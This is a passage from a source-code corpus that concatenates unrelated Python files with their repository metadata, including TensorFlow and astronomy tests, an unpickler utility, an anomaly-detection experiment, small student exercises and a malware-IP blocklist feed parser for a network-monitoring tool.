# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""Tests for tensorflow.python.training.saver.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from tensorflow.core.protobuf import saver_pb2
from tensorflow.python.client import session
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import saver
class SaverLargeVariableTest(test.TestCase):
# NOTE: This is in a separate file from saver_test.py because the
# large allocations do not play well with TSAN, and cause flaky
# failures.
def testLargeVariable(self):
save_path = os.path.join(self.get_temp_dir(), "large_variable")
with session.Session("", graph=ops.Graph()) as sess:
# Declare a variable that is exactly 2GB. This should fail,
# because a serialized checkpoint includes other header
# metadata.
with ops.device("/cpu:0"):
var = variables.Variable(
constant_op.constant(
False, shape=[2, 1024, 1024, 1024], dtype=dtypes.bool))
save = saver.Saver(
{
var.op.name: var
}, write_version=saver_pb2.SaverDef.V1)
var.initializer.run()
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
"Tensor slice is too large to serialize"):
save.save(sess, save_path)
if __name__ == "__main__":
test.main()
|
[
"v-grniki@microsoft.com"
] |
v-grniki@microsoft.com
|
3d6963aee849bab68187c59aa775a10ae4a266f5
|
84b5ac79cb471cad1d54ed1d2c842dc5581a03f0
|
/branches/pylint/config/scripts/paella-export-profile
|
777b1b8eccf1dd0bbd7a397eb1c75fd8f43c9ebf
|
[] |
no_license
|
BackupTheBerlios/paella-svn
|
c8fb5ea3ae2a5e4ca6325a0b3623d80368b767f3
|
d737a5ea4b40f279a1b2742c62bc34bd7df68348
|
refs/heads/master
| 2021-01-18T14:07:40.881696
| 2012-11-13T20:33:08
| 2012-11-13T20:33:08
| 40,747,253
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 377
|
#!/usr/bin/env python
import os, sys
from paella.db import PaellaConnection
from paella.db.profile.xmlgen import PaellaProfiles
conn = PaellaConnection()
args = sys.argv[1:]
profile = args[0]
profiles = PaellaProfiles(conn)
tfile = file(profile + '.xml', 'w')
xml = profiles.export_profile(profile)
xml.writexml(tfile, indent='\t', newl='\n', addindent='\t')
tfile.close()
|
[
"umeboshi@cfc4e7be-4be4-0310-bcfe-fc894edce94f"
] |
umeboshi@cfc4e7be-4be4-0310-bcfe-fc894edce94f
|
|
bbbfb496488a02ad49a1820a1d8e385052809eb7
|
3950cb348a4a3ff6627d502dbdf4e576575df2fb
|
/.venv/Lib/site-packages/apptools/persistence/versioned_unpickler.py
|
25338c9278da68d60cad7b6d117da78e73aaacdc
|
[] |
no_license
|
Bdye15/Sample_Programs
|
a90d288c8f5434f46e1d266f005d01159d8f7927
|
08218b697db91e55e8e0c49664a0b0cb44b4ab93
|
refs/heads/main
| 2023-03-02T04:40:57.737097
| 2021-01-31T03:03:59
| 2021-01-31T03:03:59
| 328,053,795
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,883
|
py
|
# (C) Copyright 2005-2020 Enthought, Inc., Austin, TX
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in LICENSE.txt and may be redistributed only under
# the conditions described in the aforementioned license. The license
# is also available online at http://www.enthought.com/licenses/BSD.txt
#
# Thanks for using Enthought open source!
# Standard library imports
from pickle import _Unpickler as Unpickler
from pickle import UnpicklingError, BUILD
import logging
from types import GeneratorType
# Enthought library imports
from apptools.persistence.updater import __replacement_setstate__
logger = logging.getLogger(__name__)
##############################################################################
# class 'NewUnpickler'
##############################################################################
class NewUnpickler(Unpickler):
"""An unpickler that implements a two-stage pickling process to make it
possible to unpickle complicated Python object hierarchies where the
unserialized state of an object depends on the state of other objects in
the same pickle.
"""
def load(self, max_pass=-1):
"""Read a pickled object representation from the open file.
Return the reconstituted object hierarchy specified in the file.
"""
# List of objects to be unpickled.
self.objects = []
# We overload the load_build method.
dispatch = self.dispatch
dispatch[BUILD[0]] = NewUnpickler.load_build
# call the super class' method.
ret = Unpickler.load(self)
self.initialize(max_pass)
self.objects = []
# Reset the Unpickler's dispatch table.
dispatch[BUILD[0]] = Unpickler.load_build
return ret
def initialize(self, max_pass):
# List of (object, generator) tuples that initialize objects.
generators = []
# Execute object's initialize to setup the generators.
for obj in self.objects:
if hasattr(obj, "__initialize__") and callable(obj.__initialize__):
ret = obj.__initialize__()
if isinstance(ret, GeneratorType):
generators.append((obj, ret))
elif ret is not None:
raise UnpicklingError(
"Unexpected return value from "
"__initialize__. %s returned %s" % (obj, ret)
)
# Ensure a maximum number of passes
if max_pass < 0:
max_pass = len(generators)
# Now run the generators.
count = 0
while len(generators) > 0:
count += 1
if count > max_pass:
not_done = [x[0] for x in generators]
msg = """Reached maximum pass count %s. You may have
a deadlock! The following objects are
uninitialized: %s""" % (
max_pass,
not_done,
)
raise UnpicklingError(msg)
for o, g in generators[:]:
try:
next(g)
except StopIteration:
generators.remove((o, g))
# Make this a class method since dispatch is a class variable.
# Otherwise, supposing the initial VersionedUnpickler.load call (which
# would have overloaded the load_build method) makes a pickle.load call at
# some point, we would have the dispatch still pointing to
# NewPickler.load_build whereas the object being passed in will be an
# Unpickler instance, causing a TypeError.
def load_build(cls, obj):
# Just save the instance in the list of objects.
if isinstance(obj, NewUnpickler):
obj.objects.append(obj.stack[-2])
Unpickler.load_build(obj)
load_build = classmethod(load_build)
class VersionedUnpickler(NewUnpickler):
"""This class reads in a pickled file created at revision version 'n'
and then applies the transforms specified in the updater class to
generate a new set of objects which are at revision version 'n+1'.
I decided to keep the loading of the updater out of this generic class
because we will want updaters to be generated for each plugin's type
of project.
This ensures that the VersionedUnpickler can remain ignorant about the
actual version numbers - all it needs to do is upgrade one release.
"""
def __init__(self, file, updater=None):
Unpickler.__init__(self, file)
self.updater = updater
def find_class(self, module, name):
"""Overridden method from Unpickler.
NB __setstate__ is not called until later.
"""
if self.updater:
# check to see if this class needs to be mapped to a new class
# or module name
original_module, original_name = module, name
module, name = self.updater.get_latest(module, name)
# load the class...
klass = self.import_name(module, name)
# add the updater.... TODO - why the old name?
self.add_updater(original_module, original_name, klass)
else:
# there is no updater so we will be reading in an up to date
# version of the file...
try:
klass = Unpickler.find_class(self, module, name)
except Exception:
logger.error("Looking for [%s] [%s]" % (module, name))
logger.exception(
"Problem using default unpickle functionality"
)
# restore the original __setstate__ if necessary
fn = getattr(klass, "__setstate_original__", False)
if fn:
setattr(klass, "__setstate__", fn)
return klass
def add_updater(self, module, name, klass):
"""If there is an updater defined for this class we will add it to the
class as the __setstate__ method.
"""
fn = self.updater.setstates.get((module, name), False)
if fn:
# move the existing __setstate__ out of the way
self.backup_setstate(module, klass)
# add the updater into the class
setattr(klass, "__updater__", fn)
# hook up our __setstate__ which updates self.__dict__
setattr(klass, "__setstate__", __replacement_setstate__)
else:
pass
def backup_setstate(self, module, klass):
"""If the class has a user defined __setstate__ we back it up."""
if getattr(klass, "__setstate__", False):
if getattr(klass, "__setstate_original__", False):
# don't overwrite the original __setstate__
name = "__setstate__%s" % self.updater.__class__
else:
# backup the original __setstate__ which we will restore
# and run later when we have finished updating the class
name = "__setstate_original__"
method = getattr(klass, "__setstate__")
setattr(klass, name, method)
else:
# the class has no __setstate__ method so do nothing
pass
def import_name(self, module, name):
"""
If the class is needed for the latest version of the application then
it should presumably exist.
If the class no longer exists then we should perhaps return
a proxy of the class.
If the persisted file is at v1 say and the application is at v3 then
objects that are required for v1 and v2 do not have to exist they only
need to be placeholders for the state during an upgrade.
"""
module = __import__(module, globals(), locals(), [name])
return vars(module)[name]
|
[
"brady.dye@bison.howard.edu"
] |
brady.dye@bison.howard.edu
|
c3d059c6a856c09a0127d8793a81b5c97ef00863
|
a3ff8c37e8079412477e203faa2f9526ffb66b7a
|
/realworld_expt/expt.py
|
9d07e0d72ad6f148d9a7608d719a22062f2252cf
|
[] |
no_license
|
greentfrapp/temp
|
07c83aaf08dd236f6305af877280698612129681
|
406864f3c7c2f78c23df2c29b640ba9ea622eb27
|
refs/heads/master
| 2020-03-29T19:24:48.466126
| 2019-01-30T15:14:10
| 2019-01-30T15:14:10
| 150,261,784
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,493
|
py
|
from __future__ import print_function
try:
raw_input
except:
raw_input = input
import numpy as np
from keras.models import load_model
import json
import tensorflow as tf
from sklearn.ensemble import IsolationForest
import matplotlib.pyplot as plt
from scipy.stats import chi
from absl import flags
from absl import app
from utils import MammoData as Data
FLAGS = flags.FLAGS
flags.DEFINE_bool("plot", False, "Plot")
flags.DEFINE_bool("train", False, "Train")
flags.DEFINE_integer("std", 10, "std")
flags.DEFINE_integer("iter", 5, "No. of iForest runs per sample set")
flags.DEFINE_integer("samples", 5, "No. of sample sets generated")
def cal_auc(x, y):
return np.trapz(y, x)
def get_dist(values):
center = np.mean(values, axis=0)
std = np.std(values, axis=0)
chi_std = chi.std(2, 0, np.linalg.norm(std))
dist = np.linalg.norm(values - center, axis=1)
for i, el in enumerate(dist):
if el > 2.7 * chi_std:
dist[i] = 0.
elif el < 2.3 * chi_std:
dist[i] = 0.
# dist = np.exp(dist)
dist /= np.sum(dist)
return dist
def roc_val(classifier, x_test, y_test):
predictions = classifier.predict(x_test)
predicted_anomalies = (predictions == -1).astype(np.int32)
tp = np.sum(predicted_anomalies[np.where(y_test == predicted_anomalies)] == 1)
tn = np.sum(predicted_anomalies[np.where(y_test == predicted_anomalies)] == 0)
fp = np.sum(predicted_anomalies) - tp
fn = np.sum(predicted_anomalies == 0) - tn
if tp == 0:
recall = tp_rate = 0.
precision = 1.
else:
recall = tp_rate = tp / (tp + fn)
precision = tp / (tp + fp)
if recall + precision == 0:
f1 = 0.
else:
f1 = (2 * recall * precision) / (recall + precision)
fp_rate = fp / (fp + tn)
return {"TPR": tp_rate, "FPR": fp_rate, "F1": f1}
def generate(n_run):
(x_train, y_train), (x_test, y_test) = dataset.load_data()
x = x_train
y = y_train
latent = encoder.predict(x)
center = np.mean(latent, axis=0)
latent = np.random.randn(synth_size, 2)
for i, vector in enumerate(latent):
latent[i] = 10. * vector / np.linalg.norm(vector)
latent += center
samples = decoder.predict(latent.reshape(-1, 2))
with open(folder + "synthetic_samples_{}.json".format(FLAGS.std, n_run), 'w') as file:
json.dump(samples.tolist(), file)
return samples
def smote(n_run):
(x_train, y_train), (x_test, y_test) = dataset.load_data()
x = x_train
y = y_train
samples = []
for i in np.arange(synth_size):
choice = np.random.choice(np.arange(len(x)))
a = x[choice]
x_copy = np.concatenate((x[:choice], x[choice + 1:]))
x_copy -= a
x_copy = np.linalg.norm(x_copy, axis=1)
b = np.argmin(x_copy)
if b >= choice:
b += 1
b = x[b]
scale = np.random.rand()
c = scale * (a-b) + b
samples.append(list(c))
with open(folder + "smote_reg_data_samples_{}.json".format(FLAGS.std, n_run), 'w') as file:
json.dump(samples, file)
return samples
def expt(n_run):
(x_train, y_train), (x_test, y_test) = dataset.load_data()
x_synth = {
"doping": generate(n_run),
"smote": smote(n_run),
}
x = {
"original": x_train,
}
for synth_type in x_synth:
x[synth_type] = np.concatenate((x_train, x_synth[synth_type]))
stat_types = ["TPR", "FPR", "F1"]
stats = {}
for method in x:
stats[method] = dict(zip(stat_types, [[] for stat in stat_types]))
con_vals = np.arange(0.01, 0.3, 0.02)
con_vals = np.concatenate(([0.001, 0.003, 0.005, 0.007], con_vals))
for i, con_val in enumerate(con_vals):
print("Run #{}/{}".format(i + 1, len(con_vals)))
run_stats = {}
for method in x:
run_stats[method] = dict(zip(stat_types, [[] for stat in stat_types]))
for j in np.arange(FLAGS.iter):
classifiers = {}
for method in x:
classifiers[method] = IsolationForest(contamination=con_val)
classifiers[method].fit(x[method])
results = roc_val(classifiers[method], x_test, y_test)
for stat in results:
run_stats[method][stat].append(results[stat])
for method in stats:
for stat in stat_types:
stats[method][stat].append(np.mean(run_stats[method][stat]))
return stats
def train():
methods = ["original", "doping", "smote"]
stat_types = ["TPR", "FPR", "F1"]
all_stats = {}
for method in methods:
all_stats[method] = dict(zip(stat_types, [[] for stat in stat_types]))
for i in np.arange(FLAGS.samples):
expt_stats = expt(i)
for method in methods:
for stat in stat_types:
all_stats[method][stat].append(expt_stats[method][stat])
for method in methods:
for stat in stat_types:
all_stats[method][stat] = np.mean(all_stats[method][stat], axis=0).tolist()
with open(folder + "stats.json".format(FLAGS.std), 'w') as file:
json.dump(all_stats, file)
def plot(all_stats, methods=None):
f1_list = []
auc_list = []
g_list = []
if methods == None:
methods = all_stats.keys()
for method in methods:
# print("\n" + method)
f1 = np.max(all_stats[method]["F1"])
auc = cal_auc(np.concatenate(([0.0], all_stats[method]["FPR"], [1.0])), np.concatenate(([0.0], all_stats[method]["TPR"], [1.0])))
# print("F1[{}]\t{}".format(np.argmax(all_stats[method]["F1"]), np.max(all_stats[method]["F1"])))
# print("AUC\t{}".format(cal_auc(np.concatenate(([0.0], all_stats[method]["FPR"], [1.0])), np.concatenate(([0.0], all_stats[method]["TPR"], [1.0])))))
f1_list.append([f1, method])
auc_list.append([auc, method])
r = all_stats[method]["TPR"][np.argmax(all_stats[method]["F1"])]
p = f1 * r / (2 * r - f1)
g = (r * p) ** 0.5
# print(2 * p * r / (p + r))
# print(p, r, f1)
g_list.append([g, method])
f1_list.sort(reverse=True)
auc_list.sort(reverse=True)
g_list.sort(reverse=True)
print("\nF1:")
for [f1, method] in f1_list:
print("{}: {}".format(method, f1))
print("\nAUC:")
for [auc, method] in auc_list:
print("{}: {}".format(method, auc))
print("\nG:")
for [g, method] in g_list:
print("{}: {}".format(method, g))
def main(unused_argv):
global desc, folder, synth_size, encoder, decoder, dataset
desc = "aae"
folder = "./expt_std{}_temp2/".format(FLAGS.std)
folder = "./"
tf.gfile.MakeDirs(folder)
synth_size = 1100
encoder = load_model('{}_encoder_{}_test.h5'.format(desc, FLAGS.std))
decoder = load_model('{}_decoder_{}_test.h5'.format(desc, FLAGS.std))
dataset = Data()
if FLAGS.train:
train()
elif FLAGS.plot:
methods = ["original", "doping", "smote"]
stat_types = ["TPR", "FPR", "F1"]
with open(folder + "stats.json".format(FLAGS.std), 'r') as file:
all_stats = json.load(file)
plot(all_stats, methods)
if __name__ == "__main__":
app.run(main)
|
[
"limsweekiat@gmail.com"
] |
limsweekiat@gmail.com
|
dec281751603425b8397dc65a0ebbd7b8b50ff7f
|
a564b8277e33eb27009089ec2e216a4d266a8861
|
/官方配套代码/15/15.3/Senior/server/CrazyitDict.py
|
6fc2e469e9af559f3323a86b8dde9a2555759584
|
[
"Unlicense"
] |
permissive
|
yifengyou/crazy-python
|
3cb50f462e4ddb921c365e2f0cb3e846e6539383
|
28099bd5011de6981a7c5412783952cc7601ae0c
|
refs/heads/main
| 2023-06-18T18:10:52.691245
| 2021-07-18T14:21:03
| 2021-07-18T14:21:03
| 387,088,939
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,708
|
py
|
# coding: utf-8
#########################################################################
# 网站: <a href="http://www.crazyit.org">疯狂Java联盟</a> #
# author yeeku.H.lee kongyeeku@163.com #
# #
# version 1.0 #
# #
# Copyright (C), 2001-2018, yeeku.H.Lee #
# #
# This program is protected by copyright laws. #
# #
# Program Name: #
# #
# <br>Date: #
#########################################################################
class CrazyitDict(dict):
# 根据value查找key
def key_from_value(self, val):
# 遍历所有key组成的集合
for key in self.keys():
# 如果指定key对应的value与被搜索的value相同,则返回对应的key
if self[key] == val:
return key
return None
# 根据value删除key
def remove_by_value(self, val):
# 遍历所有key组成的集合
for key in self.keys():
# 如果指定key对应的value与被搜索的value相同,则返回对应的key
if self[key] == val:
self.pop(key)
return
|
[
"842056007@qq.com"
] |
842056007@qq.com
|
9e04759332a82f222f84a256886b4bd3e5300456
|
e42478c0c501a11280a3b0b3266a931215fd5a34
|
/fxdayu_data/handler/base.py
|
3e03b7fc7e8eeb0830d6ff42ded200f68ffccb42
|
[] |
no_license
|
limingbei/fxdayu_data
|
d36af819ee32e32e541eaf205b0e1c9309ffc89a
|
2d1541def42b31e839e1027a85cfd08665f731a3
|
refs/heads/master
| 2020-03-17T23:16:37.656128
| 2018-01-05T05:50:41
| 2018-01-05T05:50:41
| 134,038,018
| 1
| 0
| null | 2018-05-19T06:55:59
| 2018-05-19T06:55:59
| null |
UTF-8
|
Python
| false
| false
| 475
|
py
|
# encoding:utf-8
from datetime import datetime
from pymongo.mongo_client import database
import pandas as pd
import pymongo
class DataHandler(object):
def write(self, *args, **kwargs):
pass
def read(self, *args, **kwargs):
pass
def inplace(self, *args, **kwargs):
pass
def update(self, *args, **kwargs):
pass
def delete(self, *args, **kwargs):
pass
def table_names(self, *args, **kwargs):
pass
|
[
"862786917@qq.com"
] |
862786917@qq.com
|
4b6c1a8e10bab33aaa6629088bb2f48ab5184699
|
d2bb13cec7faf28e3d268312298f03c99806bd8b
|
/calc_tdc_offset/corelli_calc_tdc_offset_func_loop.py
|
f73d0e5a8641d0c738264885957499cec67aac99
|
[] |
no_license
|
rosswhitfield/corelli
|
06a91c26556ea788f20f973a1018a56e82a8c09a
|
d9e47107e3272c4457aa0d2e0732fc0446f54279
|
refs/heads/master
| 2021-08-07T14:04:24.426151
| 2021-08-03T19:19:05
| 2021-08-03T19:19:05
| 51,771,543
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 175
|
py
|
from corelli_calc_tdc_offset_func import *
for i in range(637,640):
#for i in range(2100,2110):
filename='CORELLI_'+str(i)
results=calc_tdc_offset(filename)
print results
|
[
"whitfieldre@ornl.gov"
] |
whitfieldre@ornl.gov
|
082ae04a5c36262e14182602b53ff46f5aa16fcf
|
1f08436bab6cd03bcfb257e8e49405cbc265195a
|
/8_function/Sample/functions_ex3.py
|
0b362e6fc10e31311f529f7db4e12747dd2833cc
|
[] |
no_license
|
kuchunbk/PythonBasic
|
e3ba6322f256d577e37deff09c814c3a374b93b2
|
a87135d7a98be8830d30acd750d84bcbf777280b
|
refs/heads/master
| 2020-03-10T04:28:42.947308
| 2018-04-17T04:25:51
| 2018-04-17T04:25:51
| 129,192,997
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 287
|
py
|
'''Question:
Write a Python function to multiply all the numbers in a list.
'''
# Python code:
def multiply(numbers):
total = 1
for x in numbers:
total *= x
return total
print(multiply((8, 2, 3, -1, 7)))
'''Output sample:
-336
'''
|
[
"kuchunbk@gmail.com"
] |
kuchunbk@gmail.com
|
1bee663d7c4ec53d0aae190aa76827e89a0ec34e
|
b65032c8b76dd2115fd37ae45669a44537ad9df4
|
/Code/dictionary_words.py
|
a1ae64f3596492ec99008c0aa807de8a02d24fd2
|
[] |
no_license
|
reikamoon/CS-1.2-Intro-Data-Structures
|
a795dc8ca9e52f02cafb9d0782a80632bcc7b206
|
40b19ad8d93631bbdbd589fa95b0b3a7ec40b53a
|
refs/heads/master
| 2022-12-22T00:22:05.667638
| 2019-12-11T20:45:11
| 2019-12-11T20:45:11
| 220,103,212
| 0
| 0
| null | 2022-12-08T06:16:43
| 2019-11-06T22:35:08
|
Python
|
UTF-8
|
Python
| false
| false
| 642
|
py
|
from random import randint
from os import sys
def get_words():
words = list()
with open('/usr/share/dict/words', 'r') as f:
words = f.read().split('\n')
return words
def random_words(integer_input, word_list):
sentence = str()
while integer_input > 0:
index = randint(0, len(words) - 1)
if integer_input == 1:
print("My Random Sentence:")
else:
sentence += word_list[index] + ' '
integer_input -= 1
return sentence
if __name__ == '__main__':
words = get_words()
integer_input = int(sys.argv[1])
print(random_words(integer_input, words))
|
[
"ambrosio.anjelica@gmail.com"
] |
ambrosio.anjelica@gmail.com
|
4c59bf2329fd1567caddbca76105185740dad7e5
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02987/s680269618.py
|
10f62cd0a31d38e548bfb5cbca9157ed13e880b2
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 254
|
py
|
S = input()
if S[0] == S[1] and S[2] == S[3] and len(set(S)) == 2:
print('Yes')
elif S[0] == S[2] and S[1] == S[3] and len(set(S)) == 2:
print('Yes')
elif S[0] == S[3] and S[1] == S[2] and len(set(S)) == 2:
print('Yes')
else:
print('No')
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
d4661de7781d69bf47240b7d4a8effe187d22ad9
|
dea3e6876afe2fdae5b5b4a3f429cfce81b7a0a1
|
/tests/test_frameSetUtils.py
|
963a1cbd09e97306839efc9adabd9dc07e8a72a9
|
[] |
no_license
|
frossie-shadow/afw
|
741f09cd202a5a9cc3b3943696a389b94a4ee404
|
a1c44404738dcd73ff400e3bcd176ffe4dd51aab
|
refs/heads/master
| 2021-01-19T17:49:51.003432
| 2017-08-19T03:11:56
| 2017-08-19T03:11:56
| 35,149,129
| 0
| 0
| null | 2015-05-06T08:54:49
| 2015-05-06T08:54:49
| null |
UTF-8
|
Python
| false
| false
| 3,063
|
py
|
from __future__ import absolute_import, division, print_function
import unittest
from lsst.afw.coord import IcrsCoord
from lsst.afw.geom import arcseconds, degrees, makeCdMatrix, Point2D
from lsst.afw.geom.detail import makeTanWcsMetadata, readFitsWcs, readLsstSkyWcs
import lsst.utils.tests
PrintStrippedNames = False
class FrameSetUtilsTestCase(lsst.utils.tests.TestCase):
"""This is sparse because SkyWcs unit tests test much of this package
"""
def setUp(self):
# arbitrary values
self.crpix = Point2D(100, 100)
self.crval = IcrsCoord(30 * degrees, 45 * degrees)
self.scale = 1.0 * arcseconds
def makeMetadata(self):
"""Return a WCS that is typical for an image
It will contain 32 cards:
- 14 standard WCS cards
- 15 standard cards:
- SIMPLE, BITPIX, NAXIS, NAXIS1, NAXIS2, BZERO, BSCALE
- DATE-OBS, MJD-OBS, TIMESYS
- EXPTIME
- 2 COMMENT cards
- INHERIT
- EXTEND
- LTV1 and LTV2, an IRAF convention LSST uses for image XY0
- 1 nonstandard card
"""
# arbitrary values
orientation = 0 * degrees
flipX = False
metadata = makeTanWcsMetadata(
crpix = self.crpix,
crval = self.crval,
cdMatrix = makeCdMatrix(scale=self.scale, orientation=orientation, flipX=flipX),
)
self.assertEqual(metadata.nameCount(), 14)
metadata.add("SIMPLE", True)
metadata.add("BITPIX", 16)
metadata.add("NAXIS", 2)
metadata.add("NAXIS1", 500)
metadata.add("NAXIS2", 200)
metadata.add("BZERO", 32768)
metadata.add("BSCALE", 1)
metadata.add("TIMESYS", "UTC")
metadata.add("UTC-OBS", "12:04:45.73")
metadata.add("DATE-OBS", "2006-05-20")
metadata.add("EXPTIME", 5.0)
metadata.add("COMMENT", "a comment")
metadata.add("COMMENT", "another comment")
metadata.add("EXTEND", True)
metadata.add("INHERIT", False)
metadata.add("LTV1", 5)
metadata.add("LTV2", -10)
metadata.add("ZOTHER", "non-standard")
return metadata
def testReadFitsWcsStripMetadata(self):
metadata = self.makeMetadata()
self.assertEqual(len(metadata.toList()), 32)
readFitsWcs(metadata, strip=False)
self.assertEqual(len(metadata.toList()), 32)
readFitsWcs(metadata, strip=True)
self.assertEqual(len(metadata.toList()), 18)
def testReadLsstSkyWcsStripMetadata(self):
metadata = self.makeMetadata()
self.assertEqual(len(metadata.toList()), 32)
readLsstSkyWcs(metadata, strip=False)
self.assertEqual(len(metadata.toList()), 32)
readLsstSkyWcs(metadata, strip=True)
self.assertEqual(len(metadata.toList()), 18)
class TestMemory(lsst.utils.tests.MemoryTestCase):
pass
def setup_module(module):
lsst.utils.tests.init()
if __name__ == "__main__":
lsst.utils.tests.init()
unittest.main()
|
[
"rowen@uw.edu"
] |
rowen@uw.edu
|
cafd330140fcfb6368723d583251829672ceb42d
|
a86599993fcca8fbe67ee02106281b5145f8db5e
|
/Laboratory 04/wdp_ftopt_l04z04pr.py
|
37e25e77b5d7c40c7a9717f6d5240df8b50d219e
|
[] |
no_license
|
pauliwu/Introduction-to-programming-in-python
|
2747572c73a5559c0636523f7b75ae6c4e79d51e
|
cc4be2030d1a0798054ec2c6b30425fd77d3e117
|
refs/heads/master
| 2022-03-31T09:15:33.191768
| 2020-01-30T22:05:53
| 2020-01-30T22:05:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 429
|
py
|
'''
Napisz program, który poprosi użytkownika o podanie promienia koła, a następnie wyświetli
informację o jego polu i obwodzie.
'''
def kolo(promien):
pi = 3.14
obwod = 2*pi*promien
pole = pi*promien**2
return pole, obwod
def main():
r = float(input("Wprowadz promien kola w cm: "))
p,o = kolo(r)
print("Obwod = ", format(o,".1f"), "cm")
print("Pole = ", format(p,".1f"), "cm^2")
main()
|
[
"58003896+majsylw@users.noreply.github.com"
] |
58003896+majsylw@users.noreply.github.com
|
761115aa3bdc406dc4f4c52ccd593a7e80e5d5c2
|
c1ad248b8172c63f7756f14cb50f96cf726f90d0
|
/tensorflow_examples/lite/model_maker/core/utils/ondevice_scann_builder.py
|
9031bc02d9da8875c3b62beb2465f38818ce479a
|
[
"Apache-2.0"
] |
permissive
|
slmsshk/examples
|
846ec816c0c6d095cf49e4054df85a80375f4b7f
|
cd89a54b9e9577bebd22a9f083526ca8cb2b58b5
|
refs/heads/master
| 2022-08-16T19:59:03.695027
| 2022-08-07T07:30:14
| 2022-08-07T07:30:14
| 256,999,865
| 1
| 0
|
Apache-2.0
| 2020-04-19T12:59:03
| 2020-04-19T12:59:01
| null |
UTF-8
|
Python
| false
| false
| 1,856
|
py
|
# Copyright 2022 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""ScannBuilder class for on-device applications."""
from google.protobuf import text_format
from scann.proto import scann_pb2
from scann.scann_ops.py import scann_builder
from scann.scann_ops.py import scann_ops_pybind
def builder(db, num_neighbors, distance_measure):
"""pybind analogue of builder() in scann_ops.py for the on-device use case."""
def builder_lambda(db, config, training_threads, **kwargs):
return scann_ops_pybind.create_searcher(db, config, training_threads,
**kwargs)
return OndeviceScannBuilder(
db, num_neighbors, distance_measure).set_builder_lambda(builder_lambda)
class OndeviceScannBuilder(scann_builder.ScannBuilder):
"""ScannBuilder for on-device applications."""
def create_config(self):
"""Creates the config."""
config = super().create_config()
config_proto = scann_pb2.ScannConfig()
text_format.Parse(config, config_proto)
# We don't support residual quantization on device so we need to disable
# use_residual_quantization.
if config_proto.hash.asymmetric_hash.use_residual_quantization:
config_proto.hash.asymmetric_hash.use_residual_quantization = False
return text_format.MessageToString(config_proto)
|
[
"copybara-worker@google.com"
] |
copybara-worker@google.com
|
4a6b78de21ffdffea8c1583ad2df047b3419aa55
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_117/ch73_2019_04_04_18_01_16_761758.py
|
2a91c18fcec24852640d02b74224cf472d03ccae
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 266
|
py
|
def remove_vogais(letras):
i=0
while i<len(letras):
if letras[i]== 'a' or letras[i] == 'e' or letras[i] == 'i' or letras[i] == 'o' or letras[i] == 'u':
del letras[i]
else:
i+=1
return remove_vogais(letras)
|
[
"you@example.com"
] |
you@example.com
|
ba7639ad6a9c59bd8170920acdd5a7a269c096e7
|
e5270423abf42482d956548333d4105d684cca31
|
/trails/feeds/malc0de.py
|
09d204f3da28e20de8dc18f4ac03427f7557e5e3
|
[
"MIT"
] |
permissive
|
ana2s007/maltrail
|
2f5f556d222b6f1ba78affedce97400da125232a
|
80979e76c33dca58313141a0e4a2626b609c3ebf
|
refs/heads/master
| 2021-01-16T22:49:25.319116
| 2016-01-28T13:04:57
| 2016-01-28T13:04:57
| 50,610,789
| 1
| 0
| null | 2016-01-28T20:18:20
| 2016-01-28T20:18:20
| null |
UTF-8
|
Python
| false
| false
| 689
|
py
|
#!/usr/bin/env python
"""
Copyright (c) 2014-2016 Miroslav Stampar (@stamparm)
See the file 'LICENSE' for copying permission
"""
from core.common import retrieve_content
__url__ = "https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/malc0de.ipset"
__check__ = "malc0de"
__info__ = "malware distribution"
__reference__ = "malc0de.com"
def fetch():
retval = {}
content = retrieve_content(__url__)
if __check__ in content:
for line in content.split('\n'):
line = line.strip()
if not line or line.startswith('#') or '.' not in line:
continue
retval[line] = (__info__, __reference__)
return retval
|
[
"miroslav.stampar@gmail.com"
] |
miroslav.stampar@gmail.com
|
1a9fa3e8dcf8c60490f47495a2566b6a1f32a92a
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_009/ch90_2019_10_02_18_22_03_037134.py
|
fcae0603fe15fc773b6d8deebd33737ee6754ef6
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
